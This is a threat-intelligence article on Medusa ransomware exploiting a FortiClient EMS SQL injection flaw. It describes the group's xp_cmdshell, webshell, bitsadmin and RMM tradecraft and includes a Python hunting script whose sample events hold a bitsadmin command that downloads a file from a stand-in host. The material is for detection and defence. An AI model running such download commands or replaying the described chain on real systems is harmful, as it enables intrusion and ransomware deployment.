Medusa Ransomware Leveraging Fortinet Vulnerability for Advanced Attacks

The Medusa ransomware group has been exploiting a critical SQL injection vulnerability in Fortinet’s FortiClient EMS software, tracked as CVE-2023-48788 (Fortinet advisory FG-IR-24-007). The flaw lets an unauthenticated attacker execute arbitrary commands on a vulnerable EMS server with crafted requests, which gives the group a foothold from which to deploy ransomware.

According to Bitdefender, the vulnerability affects FortiClient EMS versions 7.2.0 through 7.2.2 and 7.0.1 through 7.0.10; EMS is the central management server for FortiClient endpoints, so a compromised instance sits in a position of trust over many machines. Medusa moved quickly to exploit the flaw against organizations in healthcare, manufacturing, and education.

In the observed attacks, Medusa exploits CVE-2023-48788 by sending requests to the EMS FcmDaemon component in which the FCTUID value carries SQL injection payloads. Because the injected statements run against EMS’s backing Microsoft SQL Server, the attackers use them to enable and invoke the xp_cmdshell stored procedure and thereby execute arbitrary operating-system commands. After gaining initial access, they install a webshell for data exfiltration and payload delivery and use built-in Windows tools such as bitsadmin to transfer files and keep a foothold on the server.

Medusa’s tradecraft after the initial compromise is mature. The group uses PowerShell scripts to run commands, collect and stage data, and launch the ransomware payload. Its encryptor, gaze.exe, terminates services and processes that would otherwise lock files and drops ransom notes containing Tor links to the group’s negotiation and leak sites. For persistence and to blend in with legitimate administration, Medusa also installs legitimate (not tampered) remote monitoring and management (RMM) tools such as ConnectWise and AnyDesk, which rarely trigger antivirus alerts.
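The chain above (SQL Server spawning a shell via xp_cmdshell, bitsadmin pulling files, RMM tools launched from a script) leaves process-creation artifacts that a SOC can hunt for. The following is an added detection example, not code from Bitdefender or the original article; it runs three hunt rules over constructed Sysmon-style process-creation events. The field names, file paths, sample events and RMM binary name patterns are assumptions for illustration.

```python
"""Hunt rules for the Medusa/CVE-2023-48788 intrusion chain, run over
constructed Sysmon Event ID 1 style process-creation events.
Added example; the events and paths below are made up, not incident data."""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str         # full path of the created process
    cmdline: str       # its command line
    parent_image: str  # full path of the parent process


def base(path: str) -> str:
    """Lower-cased basename of a Windows path (ntpath handles backslashes)."""
    return ntpath.basename(path).lower()


# Interpreters that SQL Server has no business spawning on an EMS host.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Substrings matched against the binary name (assumed names for the RMM tools).
RMM_TAGS = ("anydesk", "screenconnect", "connectwise")

SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL15.FCEMS\MSSQL\Binn\sqlservr.exe"

# Constructed sample events (not captured from a real incident).
SAMPLE_EVENTS = [
    # benign: SQL Server service started by the Service Control Manager
    ProcEvent("ems01", SQL, "sqlservr.exe -sFCEMS", r"C:\Windows\System32\services.exe"),
    # xp_cmdshell abuse: SQL Server spawning a shell
    ProcEvent("ems01", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami", SQL),
    # follow-on download with bitsadmin from that shell
    ProcEvent("ems01", r"C:\Windows\System32\bitsadmin.exe",
              "bitsadmin /transfer job /download /priority high http://example.invalid/a C:\\Users\\Public\\a.exe",
              r"C:\Windows\System32\cmd.exe"),
    # RMM tool launched from a script interpreter rather than by an admin
    ProcEvent("ems01", r"C:\Users\Public\AnyDesk.exe", "AnyDesk.exe --install",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    # benign: the same RMM tool started interactively by a user
    ProcEvent("ws07", r"C:\Program Files\AnyDesk\AnyDesk.exe", "AnyDesk.exe",
              r"C:\Windows\explorer.exe"),
]


def hunt(events):
    """Return (rule, host, image basename) for every event that matches a rule."""
    hits = []
    for ev in events:
        img, parent, cmd = base(ev.image), base(ev.parent_image), ev.cmdline.lower()
        # Rule 1: sqlservr.exe -> shell is the classic xp_cmdshell signature.
        if parent == "sqlservr.exe" and img in SHELLS:
            hits.append(("sqlserver_spawned_shell", ev.host, img))
        # Rule 2: bitsadmin used to download, a living-off-the-land transfer.
        if img == "bitsadmin.exe" and "/transfer" in cmd:
            hits.append(("bitsadmin_transfer", ev.host, img))
        # Rule 3: RMM tool started by a shell/script rather than a user session.
        if any(tag in img for tag in RMM_TAGS) and parent in SHELLS:
            hits.append(("rmm_from_shell", ev.host, img))
    return hits


if __name__ == "__main__":
    for rule, host, image in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule} ({image})")
```

Rule 1 is close to high fidelity on an EMS server, since nothing in normal EMS operation requires SQL Server to launch a command interpreter; rules 2 and 3 need baselining, because administrators do legitimately use bitsadmin and RMM tools. After patching, it is also worth confirming on the EMS database that xp_cmdshell is disabled (`EXEC sp_configure 'xp_cmdshell'` should report a run value of 0), since an attacker who enabled it through the injection may have left it on.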

To defend against these attacks, organizations running FortiClient EMS should first upgrade to a fixed release (7.2.3 or later, or 7.0.11 or later) and avoid exposing the EMS server to untrusted networks. Beyond that, the usual controls apply: timely patch management, network segmentation so a compromised management server cannot reach everything, offline and tested backups, and monitoring for the living-off-the-land tools and RMM software described above. As Medusa continues to refine its techniques, a layered defense is the only realistic posture.
